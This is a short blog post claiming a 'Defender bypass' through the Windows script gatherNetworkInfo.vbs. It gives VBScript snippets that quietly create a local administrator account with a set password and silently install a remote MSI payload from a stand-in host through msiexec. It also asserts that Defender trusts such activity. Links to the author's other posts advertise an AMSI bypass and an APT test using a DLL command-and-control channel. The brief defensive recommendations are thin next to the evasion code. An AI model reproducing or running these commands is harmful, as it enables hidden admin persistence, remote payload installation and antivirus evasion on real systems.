Defender bypass methot

-

Defender bypass methot:

Command Execution via gatherNetworkInfo.vbs and Defender Bypass: A Technical Analysis

📅 Date: 19.02.2025

✍️ Author: Eneshan Erdoğan Karaca

🎯 Topic: System32, Command Execution, Defender Dynamics, LOLBins

📂 Analyzed File: gatherNetworkInfo.vbs


🔍 Introduction

Certain built-in script files in Windows are designed for system-related tasks. One such file, gatherNetworkInfo.vbs, is used to collect network information and resides in the System32 directory. This article provides a technical examination of the script’s structure, its command execution capabilities, and how Windows Defender approaches this file.


1️⃣ Command Execution Behavior in gatherNetworkInfo.vbs

🧠 Script Behavior

The gatherNetworkInfo.vbs script utilizes the WScript.Shell object to perform command-line operations. For example, the script can be structured as follows:


vbscript

Set shell = CreateObject("WScript.Shell")

shell.Run "cmd /c echo Hello World!"

This setup allows silent execution of commands without displaying any user interface, enabling commands embedded within the script to run stealthily on the system.


🧪 Example Scenario


vbscript

Set shell = CreateObject("WScript.Shell")

shell.Run "cmd /c net user techadmin Password123 /add"

shell.Run "cmd /c net localgroup Administrators techadmin /add"

In this example, the script initiates user and group management operations on the system.


🔎 Observations


Since the script is a system file, Defender often treats it as trusted.


Commands can execute without triggering suspicious behavior detection.


Behavior-based security solutions should pay close attention to inline commands within VBS files.


2️⃣ gatherNetworkInfo.vbs + LOLBins: External Command Execution

🧠 Theoretical Structure

Windows includes system components known as "LOLBins" (Living-Off-The-Land Binaries) that can download and execute external content. The gatherNetworkInfo.vbs script can invoke these components, for example:


vbscript

Set shell = CreateObject("WScript.Shell")

shell.Run "msiexec /q /i http://example.com/payload.msi"

🧪 Potential Scenario


MSI packages can be silently installed using quiet parameters.


The script can interact with these system binaries to perform operations.


Defender often does not raise alerts since actions are performed via legitimate system files.


🛡️ Recommendations and Insights


If System32 VBS scripts can be modified, their behaviors should be actively monitored.


Logging and content inspection should be implemented especially around WScript.Shell command calls.


Defender must analyze not only file origins but also behaviors dynamically.


The silent execution ability of LOLBin-invoking VBS files makes them critical monitoring points for incident response teams.


📌 Conclusion

The command execution capability of built-in scripts like gatherNetworkInfo.vbs is beneficial for system management but can have serious implications in both intentional and accidental misuse scenarios. Security solutions like Defender should enhance sensitivity beyond file trust based on origin and incorporate behavior analytics for such cases

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

New Amsi bypass 2025

-
  AMSI Bypass Techniques: Evading Windows Defender with Modern Methods Introduction Hello Microsoft team and fellow cybersecurity enthusiasts, In this post, I’ll walk you through the process of bypassing the Antimalware Scan Interface (AMSI) on Windows. We’ll explore traditional evasion methods, their limitations, and how modern, more sophisticated techniques—especially those implemented using a tool I developed called Micrasota —can be used to defeat AMSI and Windows Defender effectively. What is AMSI? AMSI is a Microsoft security feature designed to scan and block malicious code, especially scripts executed via PowerShell, CMD, WScript, or CScript. While powerful, AMSI has several design limitations that make it vulnerable to certain evasion techniques. Traditional Methods vs. Micrasota Old-school bypass techniques include: Code fragmentation Variable manipulation Instruction concatenation These methods were once effective but are now easily detected by Wind...
Devamı

2025 apt Antivirus test

-
APT Simülasyon Test Raporu - 2025 APT Simülasyon Test Raporu - 2025 Hazırlayan: Enes Amaç: Farklı antivirüs yazılımlarına karşı hedef sistemde gerçekleştirilmiş APT (Advanced Persistent Threat) saldırı senaryolarının tespit edilebilirliğini değerlendirmek. Test Ortamı İşletim Sistemi: Windows 10 Pro (21H2), 64-bit Test Makinesi: VM ortamında, internet bağlantılı, 4 GB RAM, 2 CPU Antivirüsler: Varsayılan ayarlar ile yüklü (gerçek zamanlı koruma açık) Test Süreci: Tüm saldırılar manuel olarak tetiklenmiş, sonuçlar anlık izleme ile kaydedilmiştir. 1. Saldırı Senaryoları Senaryo Açıklama Teknik 1 DLL dosyası aracılığıyla kötü amaçlı yük sistemde çalıştırıldı. DLL, PowerShell tabanlı AES şifreli komut alma ve sonuç gönderme mekanizması ile komut ve kontrol (C2) kanalı kurdu. Saldırgan, bu yöntemle hedef sistem üzerinde sürekli ve gizli iletişim sağladı. Reflective DLL Injection, AES 2 VBS script ile PowerSh...
Devamı